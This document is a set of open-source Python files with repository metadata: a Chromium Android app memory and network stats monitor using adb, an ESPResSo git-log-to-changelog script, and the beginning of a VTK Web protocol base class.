import devil_chromium
class Utils(object):
"""A helper class to hold various utility methods."""
@staticmethod
def FindLines(haystack, needle):
"""A helper method to find lines in |haystack| that contain the string
|needle|."""
return [ hay for hay in haystack if needle in hay ]
class Validator(object):
"""A helper class with validation methods for argparse."""
@staticmethod
def ValidatePath(path):
"""An argparse validation method to make sure a file path is writable."""
if os.path.exists(path):
return path
elif os.access(os.path.dirname(path), os.W_OK):
return path
raise argparse.ArgumentTypeError("%s is an invalid file path" % path)
@staticmethod
def ValidatePdfPath(path):
"""An argparse validation method to make sure a pdf file path is writable.
Validates a file path to make sure it is writable and also appends '.pdf' if
necessary."""
if os.path.splitext(path)[-1].lower() != 'pdf':
path = path + '.pdf'
return Validator.ValidatePath(path)
@staticmethod
def ValidateNonNegativeNumber(val):
"""An argparse validation method to make sure a number is not negative."""
ival = int(val)
if ival < 0:
raise argparse.ArgumentTypeError("%s is a negative integer" % val)
return ival
class Timer(object):
"""A helper class to track timestamps based on when this program was
started"""
starting_time = time.time()
@staticmethod
def GetTimestamp():
"""A helper method to return the time (in seconds) since this program was
started."""
return time.time() - Timer.starting_time
class DeviceHelper(object):
"""A helper class with various generic device interaction methods."""
@staticmethod
def __GetUserIdForProcessName(adb, process_name):
"""Returns the userId of the application associated by |pid| or None if
not found."""
try:
process_name = process_name.split(':')[0]
cmd = ['dumpsys', 'package', process_name]
user_id_lines = adb.RunShellCommand(' '.join(cmd), large_output=True)
user_id_lines = Utils.FindLines(user_id_lines, 'userId=')
if not user_id_lines:
return None
columns = re.split('\s+|=', user_id_lines[0].strip())
if len(columns) >= 2:
return columns[1]
except device_errors.AdbShellCommandFailedError:
pass
return None
@staticmethod
def GetDeviceModel(adb):
"""Returns the model of the device with the |adb| connection."""
return adb.GetProp('ro.product.model').strip()
@staticmethod
def GetDeviceToTrack(preset=None):
"""Returns a device serial to connect to. If |preset| is specified it will
return |preset| if it is connected and |None| otherwise. If |preset| is not
specified it will return the first connected device."""
devices = [d.adb.GetDeviceSerial()
for d in device_utils.DeviceUtils.HealthyDevices()]
if not devices:
return None
if preset:
return preset if preset in devices else None
return devices[0]
@staticmethod
def GetPidsToTrack(adb, default_pid=None, process_filter=None):
"""Returns a list of tuples of (userid, pids, process name) based on the
input arguments. If |default_pid| is specified it will return that pid if
it exists. If |process_filter| is specified it will return the pids of
processes with that string in the name. If both are specified it will
intersect the two. The returned result is sorted based on userid."""
pids = []
try:
cmd = ['ps']
pid_lines = adb.RunShellCommand(' '.join(cmd), large_output=True)
if default_pid:
pid_lines = Utils.FindLines(pid_lines, str(default_pid))
if process_filter:
pid_lines = Utils.FindLines(pid_lines, process_filter)
for line in pid_lines:
data = re.split('\s+', line.strip())
pid = data[1]
name = data[-1]
# Confirm that the pid and name match. Using a regular grep isn't
# reliable when doing it on the whole 'ps' input line.
pid_matches = not default_pid or pid == str(default_pid)
name_matches = not process_filter or name.find(process_filter) != -1
if pid_matches and name_matches:
userid = DeviceHelper.__GetUserIdForProcessName(adb, name)
pids.append((userid, pid, name))
except device_errors.AdbShellCommandFailedError:
pass
return sorted(pids, key=lambda tup: tup[0])
class NetworkHelper(object):
"""A helper class to query basic network usage of an application."""
@staticmethod
def QueryNetwork(adb, userid):
"""Queries the device for network information about the application with a
user id of |userid|. It will return a list of values:
[ Download Background, Upload Background, Download Foreground, Upload
Foreground ]. If the application is not found it will return
[ 0, 0, 0, 0 ]."""
results = [0, 0, 0, 0]
if not userid:
return results
try:
# Parsing indices for scanning a row from /proc/net/xt_qtaguid/stats.
# The application id
userid_idx = 3
# Whether or not the transmission happened with the application in the
# background (0) or foreground (1).
bg_or_fg_idx = 4
# The number of bytes received.
rx_idx = 5
# The number of bytes sent.
tx_idx = 7
cmd = ['cat', '/proc/net/xt_qtaguid/stats']
net_lines = adb.RunShellCommand(' '.join(cmd), large_output=True)
net_lines = Utils.FindLines(net_lines, userid)
for line in net_lines:
data = re.split('\s+', line.strip())
if data[userid_idx] != userid:
continue
dst_idx_offset = None
if data[bg_or_fg_idx] == '0':
dst_idx_offset = 0
elif data[bg_or_fg_idx] == '1':
dst_idx_offset = 2
if dst_idx_offset is None:
continue
results[dst_idx_offset] = round(float(data[rx_idx]) / 1000.0, 2)
results[dst_idx_offset + 1] = round(float(data[tx_idx]) / 1000.0, 2)
except device_errors.AdbShellCommandFailedError:
pass
return results
class MemoryHelper(object):
"""A helper class to query basic memory usage of a process."""
@staticmethod
def QueryMemory(adb, pid):
"""Queries the device for memory information about the process with a pid of
|pid|. It will query Native, Dalvik, and Pss memory of the process. It
returns a list of values: [ Native, Pss, Dalvik ]. If the process is not
found it will return [ 0, 0, 0 ]."""
results = [0, 0, 0]
mem_lines = adb.RunShellCommand(' '.join(['dumpsys', 'meminfo', pid]))
for line in mem_lines:
match = re.split('\s+', line.strip())
# Skip data after the 'App Summary' line. This is to fix builds where
# they have more entries that might match the other conditions.
if len(match) >= 2 and match[0] == 'App' and match[1] == 'Summary':
break
result_idx = None
query_idx = None
if match[0] == 'Native' and match[1] == 'Heap':
result_idx = 0
query_idx = -2
elif match[0] == 'Dalvik' and match[1] == 'Heap':
result_idx = 2
query_idx = -2
elif match[0] == 'TOTAL':
result_idx = 1
query_idx = 1
# If we already have a result, skip it and don't overwrite the data.
if result_idx is not None and results[result_idx] != 0:
continue
if result_idx is not None and query_idx is not None:
results[result_idx] = round(float(match[query_idx]) / 1000.0, 2)
return results
class GraphicsHelper(object):
"""A helper class to query basic graphics memory usage of a process."""
# TODO(dtrainor): Find a generic way to query/fall back for other devices.
# Is showmap consistently reliable?
__NV_MAP_MODELS = ['Xoom']
__NV_MAP_FILE_LOCATIONS = ['/d/nvmap/generic-0/clients',
'/d/nvmap/iovmm/clients']
__SHOWMAP_MODELS = ['Nexus S',
'Nexus S 4G',
'Galaxy Nexus',
'Nexus 4',
'Nexus 5',
'Nexus 7']
__SHOWMAP_KEY_MATCHES = ['/dev/pvrsrvkm',
'/dev/kgsl-3d0']
@staticmethod
def __QueryShowmap(adb, pid):
"""Attempts to query graphics memory via the 'showmap' command. It will
look for |self.__SHOWMAP_KEY_MATCHES| entries to try to find one that
represents the graphics memory usage. Will return this as a single entry
array of [ Graphics ]. If not found, will return [ 0 ]."""
try:
mem_lines = adb.RunShellCommand(' '.join(['showmap', '-t', pid]))
for line in mem_lines:
match = re.split('[ ]+', line.strip())
if match[-1] in GraphicsHelper.__SHOWMAP_KEY_MATCHES:
return [ round(float(match[2]) / 1000.0, 2) ]
except device_errors.AdbShellCommandFailedError:
pass
return [ 0 ]
@staticmethod
def __NvMapPath(adb):
"""Attempts to find a valid NV Map file on the device. It will look for a
file in |self.__NV_MAP_FILE_LOCATIONS| and see if one exists. If so, it
will return it."""
for nv_file in GraphicsHelper.__NV_MAP_FILE_LOCATIONS:
exists = adb.RunShellCommand(' '.join(['ls', nv_file]))
if exists[0] == nv_file.split('/')[-1]:
return nv_file
return None
@staticmethod
def __QueryNvMap(adb, pid):
"""Attempts to query graphics memory via the NV file map method. It will
find a possible NV Map file from |self.__NvMapPath| and try to parse the
graphics memory from it. Will return this as a single entry array of
[ Graphics ]. If not found, will return [ 0 ]."""
nv_file = GraphicsHelper.__NvMapPath(adb)
if nv_file:
mem_lines = adb.RunShellCommand(' '.join(['cat', nv_file]))
for line in mem_lines:
match = re.split(' +', line.strip())
if match[2] == pid:
return [ round(float(match[3]) / 1000000.0, 2) ]
return [ 0 ]
@staticmethod
def QueryVideoMemory(adb, pid):
"""Queries the device for graphics memory information about the process with
a pid of |pid|. Not all devices are currently supported. If possible, this
will return a single entry array of [ Graphics ]. Otherwise it will return
[ 0 ].
Please see |self.__NV_MAP_MODELS| and |self.__SHOWMAP_MODELS|
to see if the device is supported. For new devices, see if they can be
supported by existing methods and add their entry appropriately. Also,
please add any new way of querying graphics memory as they become
available."""
model = DeviceHelper.GetDeviceModel(adb)
if model in GraphicsHelper.__NV_MAP_MODELS:
return GraphicsHelper.__QueryNvMap(adb, pid)
elif model in GraphicsHelper.__SHOWMAP_MODELS:
return GraphicsHelper.__QueryShowmap(adb, pid)
return [ 0 ]
class DeviceSnapshot(object):
"""A class holding a snapshot of memory and network usage for various pids
that are being tracked. If |show_mem| is True, this will track memory usage.
If |show_net| is True, this will track network usage.
Attributes:
pids: A list of tuples (userid, pid, process name) that should be
tracked.
memory: A map of entries of pid => memory consumption array. Right now
the indices are [ Native, Pss, Dalvik, Graphics ].
network: A map of entries of userid => network consumption array. Right
now the indices are [ Download Background, Upload Background,
Download Foreground, Upload Foreground ].
timestamp: The amount of time (in seconds) between when this program started
and this snapshot was taken.
"""
def __init__(self, adb, pids, show_mem, show_net):
"""Creates an instances of a DeviceSnapshot with an |adb| device connection
and a list of (pid, process name) tuples."""
super(DeviceSnapshot, self).__init__()
self.pids = pids
self.memory = {}
self.network = {}
self.timestamp = Timer.GetTimestamp()
for (userid, pid, name) in pids:
if show_mem:
self.memory[pid] = self.__QueryMemoryForPid(adb, pid)
if show_net and userid not in self.network:
self.network[userid] = NetworkHelper.QueryNetwork(adb, userid)
@staticmethod
def __QueryMemoryForPid(adb, pid):
"""Queries the |adb| device for memory information about |pid|. This will
return a list of memory values that map to [ Native, Pss, Dalvik,
Graphics ]."""
results = MemoryHelper.QueryMemory(adb, pid)
results.extend(GraphicsHelper.QueryVideoMemory(adb, pid))
return results
def __GetProcessNames(self):
"""Returns a list of all of the process names tracked by this snapshot."""
return [tuple[2] for tuple in self.pids]
def HasResults(self):
"""Whether or not this snapshot was tracking any processes."""
return self.pids
def GetPidInfo(self):
"""Returns a list of (userid, pid, process name) tuples that are being
tracked in this snapshot."""
return self.pids
def GetNameForPid(self, search_pid):
"""Returns the process name of a tracked |search_pid|. This only works if
|search_pid| is tracked by this snapshot."""
for (userid, pid, name) in self.pids:
if pid == search_pid:
return name
return None
def GetUserIdForPid(self, search_pid):
"""Returns the application userId for an associated |pid|. This only works
if |search_pid| is tracked by this snapshot and the application userId is
queryable."""
for (userid, pid, name) in self.pids:
if pid == search_pid:
return userid
return None
def IsFirstPidForUserId(self, search_pid):
"""Returns whether or not |search_pid| is the first pid in the |pids| with
the associated application userId. This is used to determine if network
statistics should be shown for this pid or if they have already been shown
for a pid associated with this application."""
prev_userid = None
for idx, (userid, pid, name) in enumerate(self.pids):
if pid == search_pid:
return prev_userid != userid
prev_userid = userid
return False
def GetMemoryResults(self, pid):
"""Returns a list of entries about the memory usage of the process specified
by |pid|. This will be of the format [ Native, Pss, Dalvik, Graphics ]."""
if pid in self.memory:
return self.memory[pid]
return None
def GetNetworkResults(self, userid):
"""Returns a list of entries about the network usage of the application
specified by |userid|. This will be of the format [ Download Background,
Upload Background, Download Foreground, Upload Foreground ]."""
if userid in self.network:
return self.network[userid]
return None
def GetLongestNameLength(self):
"""Returns the length of the longest process name tracked by this
snapshot."""
return len(max(self.__GetProcessNames(), key=len))
def GetTimestamp(self):
"""Returns the time since program start that this snapshot was taken."""
return self.timestamp
class OutputBeautifier(object):
"""A helper class to beautify the memory output to various destinations.
Attributes:
can_color: Whether or not the output should include ASCII color codes to
make it look nicer. Default is |True|. This is disabled when
writing to a file or a graph.
overwrite: Whether or not the output should overwrite the previous output.
Default is |True|. This is disabled when writing to a file or a
graph.
"""
__MEMORY_COLUMN_TITLES = ['Native',
'Pss',
'Dalvik',
'Graphics']
__NETWORK_COLUMN_TITLES = ['Bg Rx',
'Bg Tx',
'Fg Rx',
'Fg Tx']
__TERMINAL_COLORS = {'ENDC': 0,
'BOLD': 1,
'GREY30': 90,
'RED': 91,
'DARK_YELLOW': 33,
'GREEN': 92}
def __init__(self, can_color=True, overwrite=True):
"""Creates an instance of an OutputBeautifier."""
super(OutputBeautifier, self).__init__()
self.can_color = can_color
self.overwrite = overwrite
self.lines_printed = 0
self.printed_header = False
@staticmethod
def __FindPidsForSnapshotList(snapshots):
"""Find the set of unique pids across all every snapshot in |snapshots|."""
pids = set()
for snapshot in snapshots:
for (userid, pid, name) in snapshot.GetPidInfo():
pids.add((userid, pid, name))
return pids
@staticmethod
def __TermCode(num):
"""Escapes a terminal code. See |self.__TERMINAL_COLORS| for a list of some
terminal codes that are used by this program."""
return '\033[%sm' % num
@staticmethod
def __PadString(string, length, left_align):
"""Pads |string| to at least |length| with spaces. Depending on
|left_align| the padding will appear at either the left or the right of the
original string."""
return (('%' if left_align else '%-') + str(length) + 's') % string
@staticmethod
def __GetDiffColor(delta):
"""Returns a color based on |delta|. Used to color the deltas between
different snapshots."""
if not delta or delta == 0.0:
return 'GREY30'
elif delta < 0:
return 'GREEN'
elif delta > 0:
return 'RED'
@staticmethod
def __CleanRound(val, precision):
"""Round |val| to |precision|. If |precision| is 0, completely remove the
decimal point."""
return int(val) if precision == 0 else round(float(val), precision)
def __ColorString(self, string, color):
"""Colors |string| based on |color|. |color| must be in
|self.__TERMINAL_COLORS|. Returns the colored string or the original
string if |self.can_color| is |False| or the |color| is invalid."""
if not self.can_color or not color or not self.__TERMINAL_COLORS[color]:
return string
return '%s%s%s' % (
self.__TermCode(self.__TERMINAL_COLORS[color]),
string,
self.__TermCode(self.__TERMINAL_COLORS['ENDC']))
def __PadAndColor(self, string, length, left_align, color):
"""A helper method to both pad and color the string. See
|self.__ColorString| and |self.__PadString|."""
return self.__ColorString(
self.__PadString(string, length, left_align), color)
def __OutputLine(self, line):
"""Writes a line to the screen. This also tracks how many times this method
was called so that the screen can be cleared properly if |self.overwrite| is
|True|."""
sys.stdout.write(line + '\n')
if self.overwrite:
self.lines_printed += 1
def __ClearScreen(self):
"""Clears the screen based on the number of times |self.__OutputLine| was
called."""
if self.lines_printed == 0 or not self.overwrite:
return
key_term_up = curses.tparm(curses.tigetstr('cuu1'))
key_term_clear_eol = curses.tparm(curses.tigetstr('el'))
key_term_go_to_bol = curses.tparm(curses.tigetstr('cr'))
sys.stdout.write(key_term_go_to_bol)
sys.stdout.write(key_term_clear_eol)
for i in range(self.lines_printed):
sys.stdout.write(key_term_up)
sys.stdout.write(key_term_clear_eol)
self.lines_printed = 0
def __PrintPidLabelHeader(self, snapshot):
"""Returns a header string with columns Pid and Name."""
if not snapshot or not snapshot.HasResults():
return
name_length = max(8, snapshot.GetLongestNameLength())
header = self.__PadString('Pid', 8, True) + ' '
header += self.__PadString('Name', name_length, False)
header = self.__ColorString(header, 'BOLD')
return header
def __PrintTimestampHeader(self):
"""Returns a header string with a Timestamp column."""
header = self.__PadString('Timestamp', 8, False)
header = self.__ColorString(header, 'BOLD')
return header
def __PrintMemoryStatsHeader(self):
"""Returns a header string for memory usage statistics."""
headers = ''
for header in self.__MEMORY_COLUMN_TITLES:
headers += self.__PadString(header, 8, True) + ' '
headers += self.__PadString('(mB)', 8, False)
return self.__ColorString(headers, 'BOLD')
def __PrintNetworkStatsHeader(self):
"""Returns a header string for network usage statistics."""
headers = ''
for header in self.__NETWORK_COLUMN_TITLES:
headers += self.__PadString(header, 8, True) + ' '
headers += self.__PadString('(kB)', 8, False)
return self.__ColorString(headers, 'BOLD')
def __PrintTrailingHeader(self, snapshot):
"""Returns a header string for the header trailer (includes timestamp)."""
if not snapshot or not snapshot.HasResults():
return
header = '(' + str(round(snapshot.GetTimestamp(), 2)) + 's)'
return self.__ColorString(header, 'BOLD')
def __PrintArrayWithDeltas(self, results, old_results, precision=2):
"""Helper method to return a string of statistics with their deltas. This
takes two arrays and prints out "current (current - old)" for all entries in
the arrays."""
if not results:
return
deltas = [0] * len(results)
if old_results:
assert len(old_results) == len(results)
deltas = map(sub, results, old_results)
output = ''
for idx, val in enumerate(results):
round_val = self.__CleanRound(val, precision)
round_delta = self.__CleanRound(deltas[idx], precision)
output += self.__PadString(str(round_val), 8, True) + ' '
output += self.__PadAndColor('(' + str(round_delta) + ')', 8, False,
self.__GetDiffColor(deltas[idx]))
return output
def __PrintPidLabelStats(self, pid, snapshot):
"""Returns a string that includes the columns pid and process name for
the specified |pid|. This lines up with the associated header."""
if not snapshot or not snapshot.HasResults():
return
name_length = max(8, snapshot.GetLongestNameLength())
name = snapshot.GetNameForPid(pid)
output = self.__PadAndColor(pid, 8, True, 'DARK_YELLOW') + ' '
output += self.__PadAndColor(name, name_length, False, None)
return output
def __PrintTimestampStats(self, snapshot):
"""Returns a string that includes the timestamp of the |snapshot|. This
lines up with the associated header."""
if not snapshot or not snapshot.HasResults():
return
timestamp_length = max(8, len("Timestamp"))
timestamp = round(snapshot.GetTimestamp(), 2)
output = self.__PadString(str(timestamp), timestamp_length, True)
return output
def __PrintMemoryStats(self, pid, snapshot, prev_snapshot):
"""Returns a string that includes memory statistics of the |snapshot|. This
lines up with the associated header."""
if not snapshot or not snapshot.HasResults():
return
results = snapshot.GetMemoryResults(pid)
if not results:
return
old_results = prev_snapshot.GetMemoryResults(pid) if prev_snapshot else None
return self.__PrintArrayWithDeltas(results, old_results, 2)
def __PrintNetworkStats(self, userid, snapshot, prev_snapshot):
"""Returns a string that includes network statistics of the |snapshot|. This
lines up with the associated header."""
if not snapshot or not snapshot.HasResults():
return
results = snapshot.GetNetworkResults(userid)
if not results:
return
old_results = None
if prev_snapshot:
old_results = prev_snapshot.GetNetworkResults(userid)
return self.__PrintArrayWithDeltas(results, old_results, 0)
def __PrintNulledNetworkStats(self):
"""Returns a string that includes empty network statistics. This lines up
with the associated header. This is used when showing statistics for pids
that share the same application userId. Network statistics should only be
shown once for each application userId."""
stats = ''
for title in self.__NETWORK_COLUMN_TITLES:
stats += self.__PadString('-', 8, True) + ' '
stats += self.__PadString('', 8, True)
return stats
def __PrintHeaderHelper(self,
snapshot,
show_labels,
show_timestamp,
show_mem,
show_net,
show_trailer):
"""Helper method to concat various header entries together into one header.
This will line up with a entry built by __PrintStatsHelper if the same
values are passed to it."""
titles = []
if show_labels:
titles.append(self.__PrintPidLabelHeader(snapshot))
if show_timestamp:
titles.append(self.__PrintTimestampHeader())
if show_mem:
titles.append(self.__PrintMemoryStatsHeader())
if show_net:
titles.append(self.__PrintNetworkStatsHeader())
if show_trailer:
titles.append(self.__PrintTrailingHeader(snapshot))
return ' '.join(titles)
def __PrintStatsHelper(self,
pid,
snapshot,
prev_snapshot,
show_labels,
show_timestamp,
show_mem,
show_net):
"""Helper method to concat various stats entries together into one line.
This will line up with a header built by __PrintHeaderHelper if the same
values are passed to it."""
stats = []
if show_labels:
stats.append(self.__PrintPidLabelStats(pid, snapshot))
if show_timestamp:
stats.append(self.__PrintTimestampStats(snapshot))
if show_mem:
stats.append(self.__PrintMemoryStats(pid, snapshot, prev_snapshot))
if show_net:
userid = snapshot.GetUserIdForPid(pid)
show_userid = snapshot.IsFirstPidForUserId(pid)
if userid and show_userid:
stats.append(self.__PrintNetworkStats(userid, snapshot, prev_snapshot))
else:
stats.append(self.__PrintNulledNetworkStats())
return ' '.join(stats)
def PrettyPrint(self, snapshot, prev_snapshot, show_mem=True, show_net=True):
"""Prints |snapshot| to the console. This will show memory and/or network
deltas between |snapshot| and |prev_snapshot|. This will also either color
or overwrite the previous entries based on |self.can_color| and
|self.overwrite|. If |show_mem| is True, this will attempt to show memory
statistics. If |show_net| is True, this will attempt to show network
statistics."""
self.__ClearScreen()
if not snapshot or not snapshot.HasResults():
self.__OutputLine("No results...")
return
# Output Format
show_label = True
show_timestamp = False
show_trailer = True
self.__OutputLine(self.__PrintHeaderHelper(snapshot,
show_label,
show_timestamp,
show_mem,
show_net,
show_trailer))
for (userid, pid, name) in snapshot.GetPidInfo():
self.__OutputLine(self.__PrintStatsHelper(pid,
snapshot,
prev_snapshot,
show_label,
show_timestamp,
show_mem,
show_net))
def PrettyFile(self,
file_path,
snapshots,
diff_against_start,
show_mem=True,
show_net=True):
"""Writes |snapshots| (a list of DeviceSnapshots) to |file_path|.
|diff_against_start| determines whether or not the snapshot deltas are
between the first entry and all entries or each previous entry. This output
will not follow |self.can_color| or |self.overwrite|. If |show_mem| is
True, this will attempt to show memory statistics. If |show_net| is True,
this will attempt to show network statistics."""
if not file_path or not snapshots:
return
# Output Format
show_label = False
show_timestamp = True
show_trailer = False
pids = self.__FindPidsForSnapshotList(snapshots)
# Disable special output formatting for file writing.
can_color = self.can_color
self.can_color = False
with open(file_path, 'w') as out:
for (userid, pid, name) in pids:
out.write(name + ' (' + str(pid) + '):\n')
out.write(self.__PrintHeaderHelper(None,
show_label,
show_timestamp,
show_mem,
show_net,
show_trailer))
out.write('\n')
prev_snapshot = None
for snapshot in snapshots:
has_mem = show_mem and snapshot.GetMemoryResults(pid) is not None
has_net = show_net and snapshot.GetNetworkResults(userid) is not None
if not has_mem and not has_net:
continue
out.write(self.__PrintStatsHelper(pid,
snapshot,
prev_snapshot,
show_label,
show_timestamp,
show_mem,
show_net))
out.write('\n')
if not prev_snapshot or not diff_against_start:
prev_snapshot = snapshot
out.write('\n\n')
# Restore special output formatting.
self.can_color = can_color
def PrettyGraph(self, file_path, snapshots):
"""Creates a pdf graph of |snapshots| (a list of DeviceSnapshots) at
|file_path|. This currently only shows memory stats and no network
stats."""
# Import these here so the rest of the functionality doesn't rely on
# matplotlib
from matplotlib import pyplot
from matplotlib.backends.backend_pdf import PdfPages
if not file_path or not snapshots:
return
pids = self.__FindPidsForSnapshotList(snapshots)
pp = PdfPages(file_path)
for (userid, pid, name) in pids:
figure = pyplot.figure()
ax = figure.add_subplot(1, 1, 1)
ax.set_xlabel('Time (s)')
ax.set_ylabel('MB')
ax.set_title(name + ' (' + pid + ')')
mem_list = [[] for x in range(len(self.__MEMORY_COLUMN_TITLES))]
timestamps = []
for snapshot in snapshots:
results = snapshot.GetMemoryResults(pid)
if not results:
continue
timestamps.append(round(snapshot.GetTimestamp(), 2))
assert len(results) == len(self.__MEMORY_COLUMN_TITLES)
for idx, result in enumerate(results):
mem_list[idx].append(result)
colors = []
for data in mem_list:
colors.append(ax.plot(timestamps, data)[0])
for i in xrange(len(timestamps)):
ax.annotate(data[i], xy=(timestamps[i], data[i]))
figure.legend(colors, self.__MEMORY_COLUMN_TITLES)
pp.savefig()
pp.close()
def main(argv):
parser = argparse.ArgumentParser()
parser.add_argument('--process',
dest='procname',
help="A (sub)string to match against process names.")
parser.add_argument('-p',
'--pid',
dest='pid',
type=Validator.ValidateNonNegativeNumber,
help='Which pid to scan for.')
parser.add_argument('-d',
'--device',
dest='device',
help='Device serial to scan.')
parser.add_argument('-t',
'--timelimit',
dest='timelimit',
type=Validator.ValidateNonNegativeNumber,
help='How long to track memory in seconds.')
parser.add_argument('-f',
'--frequency',
dest='frequency',
default=0,
type=Validator.ValidateNonNegativeNumber,
help='How often to poll in seconds.')
parser.add_argument('-s',
'--diff-against-start',
dest='diff_against_start',
action='store_true',
help='Whether or not to always compare against the'
' original memory values for deltas.')
parser.add_argument('-b',
'--boring-output',
dest='dull_output',
action='store_true',
help='Whether or not to dull down the output.')
parser.add_argument('-k',
'--keep-results',
dest='no_overwrite',
action='store_true',
help='Keeps printing the results in a list instead of'
' overwriting the previous values.')
parser.add_argument('-g',
'--graph-file',
dest='graph_file',
type=Validator.ValidatePdfPath,
help='PDF file to save graph of memory stats to.')
parser.add_argument('-o',
'--text-file',
dest='text_file',
type=Validator.ValidatePath,
help='File to save memory tracking stats to.')
parser.add_argument('-m',
'--memory',
dest='show_mem',
action='store_true',
help='Whether or not to show memory stats. True by'
' default unless --n is specified.')
parser.add_argument('-n',
'--net',
dest='show_net',
action='store_true',
help='Whether or not to show network stats. False by'
' default.')
args = parser.parse_args()
# Add a basic filter to make sure we search for something.
if not args.procname and not args.pid:
args.procname = 'chrome'
# Make sure we show memory stats if nothing was specifically requested.
if not args.show_net and not args.show_mem:
args.show_mem = True
devil_chromium.Initialize()
curses.setupterm()
printer = OutputBeautifier(not args.dull_output, not args.no_overwrite)
sys.stdout.write("Running... Hold CTRL-C to stop (or specify timeout).\n")
try:
last_time = time.time()
adb = None
old_snapshot = None
snapshots = []
while not args.timelimit or Timer.GetTimestamp() < float(args.timelimit):
# Check if we need to track another device
device = DeviceHelper.GetDeviceToTrack(args.device)
if not device:
adb = None
elif not adb or device != str(adb):
#adb = adb_wrapper.AdbWrapper(device)
adb = device_utils.DeviceUtils(device)
old_snapshot = None
snapshots = []
try:
adb.EnableRoot()
except device_errors.CommandFailedError:
sys.stderr.write('Unable to run adb as root.\n')
sys.exit(1)
# Grab a snapshot if we have a device
snapshot = None
if adb:
pids = DeviceHelper.GetPidsToTrack(adb, args.pid, args.procname)
snapshot = None
if pids:
snapshot = DeviceSnapshot(adb, pids, args.show_mem, args.show_net)
if snapshot and snapshot.HasResults():
snapshots.append(snapshot)
printer.PrettyPrint(snapshot, old_snapshot, args.show_mem, args.show_net)
# Transfer state for the next iteration and sleep
delay = max(1, args.frequency)
if snapshot:
delay = max(0, args.frequency - (time.time() - last_time))
time.sleep(delay)
last_time = time.time()
if not old_snapshot or not args.diff_against_start:
old_snapshot = snapshot
except KeyboardInterrupt:
pass
if args.graph_file:
printer.PrettyGraph(args.graph_file, snapshots)
if args.text_file:
printer.PrettyFile(args.text_file,
snapshots,
args.diff_against_start,
args.show_mem,
args.show_net)
if __name__ == '__main__':
sys.exit(main(sys.argv))
|
ds-hwang/chromium-crosswalk
|
tools/android/appstats.py
|
Python
|
bsd-3-clause
| 37,289
|
[
"Galaxy"
] |
a6f5897741a67309e37d4f869f8dd1e0ec67c17b2f2758b1751a3ddd71826261
|
#!/usr/bin/env python3
# Copyright (C) 2012-2019 The ESPResSo project
# Copyright (C) 2011 Olaf Lenz
# Copyright 2008 Marcus D. Hanwell <marcus@cryos.org>
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import re
import os
# Execute git log with the desired command line options.
fin = os.popen(
'git log --summary --stat --no-merges --date=short 3.0.1..', 'r')
# Set up the loop variables in order to locate the blocks we want
authorFound = False
dateFound = False
messageFound = False
filesFound = False
message = ""
messageNL = False
files = ""
prevAuthorLine = ""
commitId = ""
# The main part of the loop
for line in fin:
# The commit line marks the start of a new commit object.
m = re.match('^commit (.*)$', line)
if m is not None:
commitId = m.group(1)
# Start all over again...
authorFound = False
dateFound = False
messageFound = False
messageNL = False
message = ""
filesFound = False
files = ""
continue
# Match the author line and extract the part we want
m = re.match(r'^Author:\s*(.*)\s*$', line)
if m is not None:
author = m.group(1)
authorFound = True
continue
# Match the date line
m = re.match(r'^Date:\s*(.*)\s*$', line)
if m is not None:
date = m.group(1)
dateFound = True
continue
# The svn-id lines are ignored
# The sign off line is ignored too
if re.search('git-svn-id:|^Signed-off-by', line) >= 0:
continue
# Extract the actual commit message for this commit
if not (authorFound & dateFound & messageFound):
# Find the commit message if we can
if len(line) == 1:
if messageNL:
messageFound = True
else:
messageNL = True
elif len(line) == 4:
messageFound = True
else:
if not message:
message = line.strip()
else:
message = message + " " + line.strip()
# If this line is hit all of the files have been stored for this commit
if re.search('files changed', line) >= 0:
filesFound = True
continue
# Collect the files for this commit. FIXME: Still need to add +/- to files
elif authorFound & dateFound & messageFound:
fileList = re.split(r' \| ', line, 2)
if len(fileList) > 1:
if files:
files = files + ", " + fileList[0].strip()
else:
files = fileList[0].strip()
# All of the parts of the commit have been found - write out the entry
if authorFound & dateFound & messageFound & filesFound:
# First the author line, only outputted if it is the first for that
# author on this day
authorLine = date + " " + author
if not prevAuthorLine:
print(authorLine)
elif authorLine == prevAuthorLine:
pass
else:
print("\n" + authorLine)
# Assemble the actual commit message line(s) and limit the line length
# to 80 characters.
commitLine = "* " + files + ": " + message
i = 0
commit = ""
while i < len(commitLine):
if len(commitLine) < i + 78:
commit = commit + "\n " + commitLine[i:len(commitLine)]
break
index = commitLine.rfind(' ', i, i + 78)
if index > i:
commit = commit + "\n " + commitLine[i:index]
i = index + 1
else:
commit = commit + "\n " + commitLine[i:78]
i = i + 79
# Write out the commit line
print(commit)
# Now reset all the variables ready for a new commit block.
authorFound = False
dateFound = False
messageFound = False
messageNL = False
message = ""
filesFound = False
files = ""
commitId = ""
prevAuthorLine = authorLine
# Close the input and output lines now that we are finished.
fin.close()
|
espressomd/espresso
|
maintainer/git2changelog.py
|
Python
|
gpl-3.0
| 4,666
|
[
"ESPResSo"
] |
e23d580849e4db45c0331ced4232984e8d8c771bcd1a466854fb272564ac4fc8
|
r"""protocols is a module that contains a set of VTK Web related
protocols that can be combined together to provide a flexible way to define
very specific web application.
"""
from time import time
import os, sys, logging, types, inspect, traceback, logging, re
try:
from vtk.vtkWebCore import vtkWebApplication, vtkWebInteractionEvent
except ImportError:
from vtkWebCore import vtkWebApplication, vtkWebInteractionEvent
from autobahn.wamp import register as exportRpc
# =============================================================================
#
# Base class for any VTK Web based protocol
#
# =============================================================================
class vtkWebProtocol(object):
def setApplication(self, app):
self.Application = app
def getApplication(self):
return self.Application
def mapIdToObject(self, id):
"""
Maps global-id for a vtkObject to the vtkObject instance. May return None if the
id is not valid.
"""
id = int(id)
if id <= 0:
return None
return self.Application.GetObjectIdMap().GetVTKObject(id)
def getGlobalId(self, obj):
"""
Return the id for a given vtkObject
"""
return self.Application.GetObjectIdMap().GetGlobalId(obj)
def getView(self, vid):
"""
Returns the view for a given view ID, if vid is None then return the
current active view.
:param vid: The view ID
:type vid: str
"""
view = self.mapIdToObject(vid)
if not view:
# Use active view is none provided.
view = self.Application.GetObjectIdMap().GetActiveObject("VIEW")
if not view:
raise Exception("no view provided: " + vid)
return view
def setActiveView(self, view):
"""
Set a vtkRenderWindow to be the active one
"""
